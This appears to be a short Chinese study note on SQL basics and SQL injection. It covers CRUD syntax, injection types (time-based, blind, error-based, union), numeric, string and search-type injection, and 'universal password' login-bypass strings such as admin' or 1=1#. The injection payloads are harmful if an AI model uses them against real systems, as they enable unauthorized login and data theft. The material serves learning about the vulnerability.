一、SQL语句基础
1.1、增删改查
- insert into 库.表(列1,列2,....) values(值1,值2,....) 条件
- delete from 库.表 条件
- update 库.表 set 列1=值,列2=值 条件
- select 列1,列2 from 库.表 条件(*代表全部列,limit分页(limit 起始下标,条数))
- (sqlserver分页是用top)
1.2、条件语句
- where ....
二、SQL注入
2.1、什么是SQL注入
用户提交的参数带入了SQL语句。
2.2、SQL注入类型
分类:注入取数据方式不一样来分类,(按获取数据的速度排列)
- 延时注入sleep(秒)
- 盲注(and 1=1 and 1=2)and hex(substr(data,1,1))>0
- 错误显示注入(利用数据库的错误消息来进行注入),mysql(64个字符),oracle(大概2000个字符左右),mssql(1前多还是2千多字符)
- union注入 union all select username from admin
2.2.1、数字型:
- sql="select * from news where id=1 and 1=1";
- sql="select * from news where id=1 order by 1";
2.2.2、字符型:
- 1' and '1'='1
- sql="select * from news where type='1' and '1'='1'";
- sql="select * from news where type='1' order by 1'";
2.2.3、搜索型:
- %' and '%'='
- sql="select * from news where title like '%%'"
2.2.4、传说中的万能密码
- admin' or 'a'='a
- admin' or 1=1#(mysql)
- admin' or 1=1--(sqlserver)
- admin' or 1=1;--(sqlserver)
- sql="select * from admin where username='' and password=''";